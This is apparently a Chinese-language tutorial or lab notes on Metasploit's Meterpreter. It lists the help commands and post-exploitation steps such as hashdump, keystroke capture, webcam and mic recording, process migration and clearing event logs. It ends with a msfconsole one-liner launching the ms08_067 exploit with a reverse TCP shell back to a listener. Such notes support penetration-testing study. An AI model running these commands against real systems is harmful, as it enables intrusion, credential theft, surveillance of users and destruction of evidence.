高級,動態,可擴展的payload
基於meterpreter上下文利用更多漏洞發起攻擊,后滲透階段一站式操作界面
完全基於內存的dll注入式payload(不寫硬盤)
注入合法系統進程並建立stager
基於stager上傳和預加載dll進行擴展模塊的注入(客戶端api)
基於stager建立的socket連接建立加密的TLS/1.0通信隧道
利用TLS隧道進一步加載后續擴展模塊(避免網絡取證)
服務端使用C語言編寫
客戶端提供基於ruby的全特性api(支持任何語言)
meterpreter>幫助
核心命令
=============
命令描述
------- -----------
? 幫助菜單
background 回到當前會話
bg 別名為背景
bgkill 殺死背景meterpreter腳本
bglist 列出運行后台腳本
bgrun 在后台執行一個meterpreter腳本
channel 顯示信息或控制活動通道
close 關閉頻道
disable_unicode_encoding 禁用unicode字符串的編碼
enable_unicode_encoding 啟用unicode字符串的編碼
exit 終止meterpreter會話
get_timeouts 獲取當前會話超時值
guid 獲取會話GUID
help 幫助菜單
info 顯示有關Post模塊的信息
irb 在當前會話中打開交互式Ruby shell
load 加載一個或多個meterpreter擴展
machine_id 獲取附加到會話的計算機的MSF ID
migrate 將服務器遷移到另一個進程
pivot 管理數據透視偵聽器
pry 在當前會話中打開Pry調試器
quit 終止meterpreter會話
read 從通道讀取數據
resource 運行存儲在文件中的命令
run 執行meterpreter腳本或Post模塊
sessions 快速切換到另一個會話
set_timeouts 設置當前會話超時值
sleep 強制Meterpreter安靜,然后重新建立會話。
transport 更改當前的傳輸機制
use 不推薦使用的別名“load”
uuid 獲取當前會話的UUID
write 將數據寫入通道
Stdapi:文件系統命令
============================
命令描述
------- -----------
cat 將文件內容讀入屏幕
cd 更改目錄
checksum 檢索文件的校驗和
cp 將源復制到目標
dir 列表文件(ls的別名)
download 下載文件或目錄
edit 編輯文件
getlwd 打印本地工作目錄
getwd 打印工作目錄
lcd 更改本地工作目錄
lls 列出本地文件
lpwd 打印本地工作目錄
ls 列出文件
mkdir 制作目錄
mv 將源移動到目標
pwd 打印工作目錄
rm 刪除指定的文件
rmdir 刪除目錄
search 搜索文件
show_mount 列出所有掛載點/邏輯驅動器
upload 上傳文件或目錄
Stdapi:網絡命令
===========================
命令描述
------- -----------
arp 顯示主機ARP緩存
getproxy 顯示當前的代理配置
ifconfig 顯示接口
ipconfig 顯示接口
netstat 顯示網絡連接
portfwd 將本地端口轉發到遠程服務
resolve 解析目標上的一組主機名
route 查看和修改路由表
Stdapi:系統命令
=======================
命令描述
------- -----------
clearev 清除事件日志
drop_token 放棄任何活動的模擬令牌。
execute 執行命令
getenv 獲取一個或多個環境變量值
getpid 獲取當前進程標識符
getprivs 嘗試啟用當前進程可用的所有權限
getsid 獲取運行服務器的用戶的SID
getuid 獲取服務器正在運行的用戶
kill 終止進程
localtime 顯示目標系統的本地日期和時間
pgrep 按名稱過濾進程
pkill 按名稱終止進程
ps 列出正在運行的進程
reboot 重新啟動遠程計算機
reg 修改遠程注冊表並與之交互
rev2self 在遠程計算機上調用RevertToSelf()
shell 進入系統命令shell
shutdown 關閉遠程計算機
steal_token 嘗試從目標進程中竊取模擬令牌
suspend 暫停或恢復進程列表
sysinfo 關於遠程系統的信息,例如OS
Stdapi:用戶界面命令
===============================
命令描述
------- -----------
enumdesktops 列出所有可訪問的桌面和窗口站
getdesktop 獲取當前的meterpreter桌面
idletime 返回遠程用戶空閑的秒數
keyscan_dump 轉儲擊鍵緩沖區
keyscan_start 開始捕獲擊鍵
keyscan_sto 停止捕獲擊鍵
screenshot 獲取交互式桌面的屏幕截圖
setdesktop 更改meterpreters當前桌面
uictl 控制一些用戶界面組件
Stdapi:網絡攝像頭命令
=======================
命令描述
------- -----------
record_mic 從默認麥克風錄制音頻X秒
webcam_chat 開始視頻聊天
webcam_list 列出網絡攝像頭
webcam_snap 從指定的網絡攝像頭拍攝快照
webcam_stream 播放指定網絡攝像頭的視頻流
Stdapi:音頻輸出命令
=============================
命令描述
------- -----------
play 播放在目標系統上播放音頻文件,沒有寫在磁盤上
Priv:提升命令
======================
命令描述
------- -----------
getsystem 嘗試將您的權限提升為本地系統的權限。
Priv:密碼數據庫命令
================================
命令描述
------- -----------
hashdump 轉儲SAM數據庫的內容
Priv:Timestomp命令
========================
命令描述
------- -----------
timestomp 操作文件MACE屬性
查看系統
查看文件及文件夾
列出進程
更改文件名字
在后台運行一個進程
先查看本機文件
然后上傳一個文件到目標上
使用vnc
刪除所有日志
下載目標的文件
先ps 列出進程 然后migrate 7636 把自己遷移到id號為7636這個進程里面
下載hash
查看掛載了幾個硬盤
搜索某個文件
arp緩存
目標操作系統空閑時間
記錄麥克風(我虛擬機沒有)
列出主機有幾個攝像頭(我虛擬機沒有)
如果有的話就可以打開攝像頭
python擴展---無需運行環境,在客戶端運行原生python代碼
load導入python擴展,寫python代碼即可
msfconsole -x(編寫腳本時便於引用)
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.13;set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.1.12;set LPORT 4444;exploit"
友情鏈接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn